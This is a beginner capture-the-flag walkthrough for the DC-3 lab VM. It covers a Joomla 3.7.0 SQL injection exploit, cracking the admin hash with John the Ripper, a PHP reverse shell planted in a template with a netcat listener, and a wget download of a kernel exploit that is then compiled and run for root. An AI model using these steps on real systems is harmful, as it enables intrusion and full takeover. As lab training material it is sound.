CTF: DC-3 Walkthrough

      Nessun commento su CTF: DC-3 Walkthrough

Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve DC-3 machine.

Description

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).

If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Technical Information

DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.

Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple – download it, unzip it, and then import it into VirtualBox and away you go.

Important

While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn’t be any problems, but I feel the need to throw this out there just in case.

Information gathering

TCP Scanning

There is only the http as service

Nikto

The scanning has detected that on the web server is running a Joomla cms

Joomscan

The 3.7.0 version has SQL injection vulnerability. We will use this exploit:

  • https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
  • ./joomblah.py http://192.168.1.165

Fantastic we got the username and the password’s hash

John the ripper

The next step is to crack the password’s hash, for to do that we will use the tool john

  • john hash.txt
  • admin:snoopy

Fantastic we cracked the correct password

Reverse shell

At this point, we need to access the web server. After the login into the admin page (http://192.168.1.165/administrator/index.php) we have to install a revshell (/usr/share/webshells/php/php-reverse-shell.php) for to do that we will modify a template page:

  • Open a new terminal and set netcat into listening mode nc -nlvp 443
  • than navigate into http://192.168.1.165/templates/protostar

Great we got a shell

Privilege Escalation

The final step is to escalate our privilege.

uname -a

Fantastic the kernel version is vulnerable, we will use this exploit:

  • https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
  • cd /tmp
  • wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
  • unzip 39772.zip
  • bash compile.sh
  • ./doubleput

Fantastic we have completed the DC-3 machine.